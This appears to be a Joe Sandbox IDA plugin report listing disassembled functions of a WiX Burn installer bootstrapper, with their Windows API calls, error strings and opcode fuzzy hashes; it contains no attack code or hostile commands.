                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessagePostWindow
                                                                                                                                                                    • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                    • API String ID: 3618638489-3051724725
                                                                                                                                                                    • Opcode ID: 3e1b145c5988f0ed457a3b5d3d9a863f7892b7a47fd01003a9f01777dde2e6a1
                                                                                                                                                                    • Instruction ID: eff79d924ca3d4d5081b0e605dad0f4dd00507dca2ab536e3dcd90c95122f30a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e1b145c5988f0ed457a3b5d3d9a863f7892b7a47fd01003a9f01777dde2e6a1
                                                                                                                                                                    • Instruction Fuzzy Hash: D14104B1A01A2EBFEB265A64CD46FFAB66CFF40754F004615FA54A61C0DBB0EC5097D0
                                                                                                                                                                    Function 0091F051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0091F06E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F19B
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F17C
                                                                                                                                                                    • Failed to post launch approved exe message., xrefs: 0091F186
                                                                                                                                                                    • Failed to copy the id., xrefs: 0091F100
                                                                                                                                                                    • UX requested unknown approved exe with id: %ls, xrefs: 0091F0CE
                                                                                                                                                                    • Failed to copy the arguments., xrefs: 0091F12D
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F089
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                                    • API String ID: 1367039788-528931743
                                                                                                                                                                    • Opcode ID: e354189bd70a36f550e9a8fb6073f48444dd6383b823108076a1738f52d91c44
                                                                                                                                                                    • Instruction ID: 7e5e84c2ca9e448239cddd9b87399061ccd982378bfc360fad0a214eadc56705
                                                                                                                                                                    • Opcode Fuzzy Hash: e354189bd70a36f550e9a8fb6073f48444dd6383b823108076a1738f52d91c44
                                                                                                                                                                    • Instruction Fuzzy Hash: 1131BF36B4822DFFDB21DF64DC19EAA77A8AF84720B018521FD04EB291EB70DD408790
                                                                                                                                                                    Function 0091969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0091A7D4,00000000,00000000,00000000,?,00000000), ref: 009196B8
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009196C6
                                                                                                                                                                      • Part of subcall function 00944102: Sleep.KERNEL32(?,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00904DBC), ref: 00944119
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009197A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                    • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                                    • API String ID: 1275171361-1187406825
                                                                                                                                                                    • Opcode ID: 25f855ccffc36dd770d5322654066f8b4f309c2ca798d32c90f3a7ba5b4e14b1
                                                                                                                                                                    • Instruction ID: a4d28a6a9791649089a030b3641af4c817b18ff654272551844d64a3ec5d589a
                                                                                                                                                                    • Opcode Fuzzy Hash: 25f855ccffc36dd770d5322654066f8b4f309c2ca798d32c90f3a7ba5b4e14b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 68213532B802287BD7325A699C5AFEB665CDFC1B65F100114FE14BB2C0D2A1AE40D6E2
                                                                                                                                                                    Function 00906F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00906FB2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009071BE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to read variable value type., xrefs: 009071A0
                                                                                                                                                                    • Failed to read variable included flag., xrefs: 009071AE
                                                                                                                                                                    • Failed to read variable literal flag., xrefs: 00907199
                                                                                                                                                                    • Failed to read variable value as number., xrefs: 00907178
                                                                                                                                                                    • Unsupported variable type., xrefs: 00907184
                                                                                                                                                                    • Failed to set variable., xrefs: 00907192
                                                                                                                                                                    • Failed to read variable count., xrefs: 00906FD2
                                                                                                                                                                    • Failed to set variable value., xrefs: 00907171
                                                                                                                                                                    • Failed to read variable value as string., xrefs: 0090718B
                                                                                                                                                                    • Failed to read variable name., xrefs: 009071A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                    • API String ID: 3168844106-528957463
                                                                                                                                                                    • Opcode ID: 84a36bd1ba5b53546b6878075f70899cd201ece2c1c0d5a84625ff2c54b3caff
                                                                                                                                                                    • Instruction ID: 424f9343af22390ab381ab847236d4a3a3c221c603fb86320fb79dfdc100ebd0
                                                                                                                                                                    • Opcode Fuzzy Hash: 84a36bd1ba5b53546b6878075f70899cd201ece2c1c0d5a84625ff2c54b3caff
                                                                                                                                                                    • Instruction Fuzzy Hash: 34718D72C0921EBFDF11DAE4DC46EAEBBB9EB84724F104521F910A61D0D734AE109BA0
                                                                                                                                                                    Function 009444D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00944550
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00944566
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 009445BF
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009445C9
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0094461D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00944628
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00944717
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0094478A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 3286166115-2967768451
                                                                                                                                                                    • Opcode ID: a11a78a85e89c3c90fa9276b655a62f4d5e374bb405186d1d3eb2d0779a82684
                                                                                                                                                                    • Instruction ID: 00669c00b84213146b78b0bace4eb01a1be348a244758946227840ef5a9bf127
                                                                                                                                                                    • Opcode Fuzzy Hash: a11a78a85e89c3c90fa9276b655a62f4d5e374bb405186d1d3eb2d0779a82684
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B812336A40226EBEF218E698C45F7F76ACAF41760F224129FD15EB280E774DD009BD0
                                                                                                                                                                    Function 00903076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 009030C1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009030C7
                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00903121
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903127
                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009031DB
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009031E5
                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0090323B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903245
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                                    • String ID: @$pathutil.cpp
                                                                                                                                                                    • API String ID: 1547313835-3022285739
                                                                                                                                                                    • Opcode ID: 6504b8c57ff73c363e3b3d810fcce27940ad8ffaf82a5d4de0d90d4b04c86d42
                                                                                                                                                                    • Instruction ID: 147be58f1d989992e026756c7da3e759fbf5e3adca18ecbbad5a810aee22f926
                                                                                                                                                                    • Opcode Fuzzy Hash: 6504b8c57ff73c363e3b3d810fcce27940ad8ffaf82a5d4de0d90d4b04c86d42
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61B337D05229AFDB219AE88C44B9EBBBDAF04750F128165EE10BB190E775DF009BD0
                                                                                                                                                                    Function 00946D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,009472C8,?,?), ref: 00946DA6
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946E11
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946E89
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946EC8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Compare
                                                                                                                                                                    • String ID: `<u$label$scheme$term
                                                                                                                                                                    • API String ID: 1324494773-4028212031
                                                                                                                                                                    • Opcode ID: 0b9241f18adf8092da025e38cfd73833bea7a7d5f7de31b6fa4ec86e242960d5
                                                                                                                                                                    • Instruction ID: be6f4b6c40a5336251195ffe9469b366be82614b98d5c67b86e957a3664462dd
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b9241f18adf8092da025e38cfd73833bea7a7d5f7de31b6fa4ec86e242960d5
                                                                                                                                                                    • Instruction Fuzzy Hash: C7515DB9D01219FBCB15DBA4CC45FAEBBB8EF06711F2442A8E511AB1A0D731DE20DB51
                                                                                                                                                                    Function 00914D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00914DC0
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 00914DEF
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00914E3A
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 00914E66
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFromStringUuid
                                                                                                                                                                    • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                    • API String ID: 4041566446-2510341293
                                                                                                                                                                    • Opcode ID: 7830e6ad68dddaa3e3a77f30004052c08930f4cce2df8943b94b2a6973b7f352
                                                                                                                                                                    • Instruction ID: 5b664fbf5b56e5f33a0ab17641b82759bce348925af425891e74e5520b916378
                                                                                                                                                                    • Opcode Fuzzy Hash: 7830e6ad68dddaa3e3a77f30004052c08930f4cce2df8943b94b2a6973b7f352
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C418A76E0431CABCF20DBE5DD05FDEB7FCAB88714F20052AE905AB280D6749985CB90
                                                                                                                                                                    Function 0091EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0090548E,?,?), ref: 0091EA9D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090548E,?,?), ref: 0091EAAA
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091E7B4,?,00000000,00000000), ref: 0091EB03
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090548E,?,?), ref: 0091EB10
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0090548E,?,?), ref: 0091EB4B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,0090548E,?,?), ref: 0091EB6A
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0090548E,?,?), ref: 0091EB77
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                    • API String ID: 2351989216-3599963359
                                                                                                                                                                    • Opcode ID: 35dc17f4dacabff9c06717cc41863f25eac5b6bc14d52f5990b8d8cc0a6e39fa
                                                                                                                                                                    • Instruction ID: 8f4dca0e5fca1f1f8ab3a6720338a35a92100f96ce9ec95ccb3953e03727adba
                                                                                                                                                                    • Opcode Fuzzy Hash: 35dc17f4dacabff9c06717cc41863f25eac5b6bc14d52f5990b8d8cc0a6e39fa
                                                                                                                                                                    • Instruction Fuzzy Hash: 3131A176E4122DBBDB10DFAA8D85ADEBABCBF04350F110065BD14F7280E2709E4087A0
                                                                                                                                                                    Function 0091E645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0090548E,?,?), ref: 0091E666
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0090548E,?,?), ref: 0091E673
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091E3C8,00000000,00000000,00000000), ref: 0091E6D2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0090548E,?,?), ref: 0091E6DF
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0090548E,?,?), ref: 0091E71A
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0090548E,?,?), ref: 0091E72E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0090548E,?,?), ref: 0091E73B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                    • API String ID: 2351989216-1977201954
                                                                                                                                                                    • Opcode ID: b985fbac27aae72503bc80633d66ec1641f9c61f707eb2541c3ce97bf448aaff
                                                                                                                                                                    • Instruction ID: d834efdf848330f5dd37ef5db20339d3e5d89ceaae3ae767f06e7587d7fe0909
                                                                                                                                                                    • Opcode Fuzzy Hash: b985fbac27aae72503bc80633d66ec1641f9c61f707eb2541c3ce97bf448aaff
                                                                                                                                                                    • Instruction Fuzzy Hash: 87318676E0022DBBDB118B99CC05DDFBBB8AB95751F114156FD10F7280E7709A408B90
                                                                                                                                                                    Function 009214E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00905405,009053BD,00000000,00905445), ref: 00921506
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921519
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(0094B488,?), ref: 0092155B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921569
                                                                                                                                                                    • ResetEvent.KERNEL32(0094B460), ref: 009215A4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009215AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                    • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2979751695-3400260300
                                                                                                                                                                    • Opcode ID: f92e671680bdfda55fde98dd8530dc39578cb13259d4a670b29fc1d9b2b3cc9e
                                                                                                                                                                    • Instruction ID: 74c124984f0dff6f3f14cd34d155c1ccf17c7b4f0877907b4a33b4438639cbc7
                                                                                                                                                                    • Opcode Fuzzy Hash: f92e671680bdfda55fde98dd8530dc39578cb13259d4a670b29fc1d9b2b3cc9e
                                                                                                                                                                    • Instruction Fuzzy Hash: E231C574A00315EBD710DF6AAD05FAF7BFCEF94711B10819AF906D61A0E770CA10AB55
                                                                                                                                                                    Function 009215FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(0094B478,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?), ref: 0092161B
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489), ref: 00921625
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0094B488,000000FF,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489), ref: 0092165F
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489), ref: 00921669
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216B4
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216C3
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216D2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                    • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                    • API String ID: 1206859064-226982402
                                                                                                                                                                    • Opcode ID: f7c61b9bad55270ba77863a0ee3803c6fb7cf09058b9f00594336d848a3bc719
                                                                                                                                                                    • Instruction ID: 652fba4b070691f1305878858e124803484c5b6208cf64b6706e69ebbf169636
                                                                                                                                                                    • Opcode Fuzzy Hash: f7c61b9bad55270ba77863a0ee3803c6fb7cf09058b9f00594336d848a3bc719
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F212732500A32BBC7215B66EC09B5ABAA8BF14726F190325ED0461DA0D775EC70DBD9
